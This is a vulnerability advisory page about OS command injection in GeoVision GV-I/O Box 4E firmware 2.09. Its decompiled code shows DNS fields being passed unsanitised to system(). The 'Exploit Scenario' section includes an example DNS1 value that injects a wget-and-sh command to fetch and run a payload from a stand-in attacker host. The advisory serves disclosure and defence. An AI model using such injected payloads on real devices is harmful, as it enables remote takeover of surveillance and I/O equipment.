Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Network-reachable endpoint, no user interaction, but DNS-set path requires admin role so PR:H; system() as device daemon yields full CIA and scope change to OS.
Primary rating from Vendor (GV).
CVSS VectorVendor: GV
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.
libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)
CNetSetObj::m_F_n_Set_DNS_Addr command injection
The following function can take up to two addresses, performs no sanitization and then calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.
int __fastcall CNetSetObj::m_F_n_Set_DNS_Addr(CNetSetObj *this, char *dns1, char *dns2)
{
int result; // r0
char v5[80]; // [sp+0h] [bp-50h] BYREF
if ( !dns1 )
result = 0;
if ( dns1 )
{
sprintf(v5, "/bin/echo nameserver %s > /etc/resolv.conf", dns1); // attacker controlled dns1 field
system(v5);
if ( dns2 )
{
sprintf(v5, "/bin/echo nameserver %s >> /etc/resolv.conf", dns2);
system(v5);
}
return 1;
}
return result;
AnalysisAI
Remote OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the DVRSearch service or Network.cgi endpoint. The flaw lives in libNetSetObj.so where DNS configuration values are concatenated into a shell command string and passed to system() without sanitization. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Attacker must be able to reach the GV-I/O Box 4E over the network on either the DVRSearch service or the Network.cgi HTTP endpoint and supply a DNS1 (and optionally DNS2) value that flows into CNetSetObj::m_F_n_Set_DNS_Addr. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 9.1 reflects network reach with low attack complexity, scope change, and high CIA impact, but it is tempered by PR:H - exploitation as scored requires high-privilege access to the device. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has reached the management network of a GV-I/O Box 4E (for example via a flat camera VLAN or compromised installer credentials) sends a crafted request to the DVRSearch service or POSTs to Network.cgi setting the DNS1 field to a value such as 1.1.1.1;wget http://attacker/x -O /tmp/x;sh /tmp/x. The libNetSetObj.so handler concatenates the field into a shell command and invokes system(), executing the attacker's payload with the daemon's privileges and giving footholds for persistence, lateral pivot into the camera/DVR network, or relay-output manipulation. … |
| Remediation | Patch availability is not explicitly stated in the supplied data, so treat this as patch available per vendor advisory and consult https://www.geovision.com.tw/cyber_security.php for the firmware release that supersedes 2.09, applying it to all GV-I/O Box 4E units. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all GeoVision GV-I/O Box 4E devices running firmware 2.09; immediately restrict administrative account creation and require multi-factor authentication for all administrative access. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Gv I O Box 4E
View allStack-based buffer overflow in GeoVision GV-I/O Box 4E embedded I/O controllers allows unauthenticated network attackers
Remote unauthenticated stack-based buffer overflow in GeoVision GV-I/O Box 4E smart I/O appliances allows any host on th
Stack-based buffer overflow in the GeoVision GV-I/O Box 4E DVRSearch service allows unauthenticated network attackers to
Stack-based buffer overflow in GeoVision GV-I/O Box 4E allows unauthenticated remote attackers to overflow a fixed-size
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows authenticated remote attackers to execute arbitrary
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows remote attackers with high privileges to execute ar
OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows attackers who can reach the device's network servic
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38653
GHSA-fx96-c5xr-q273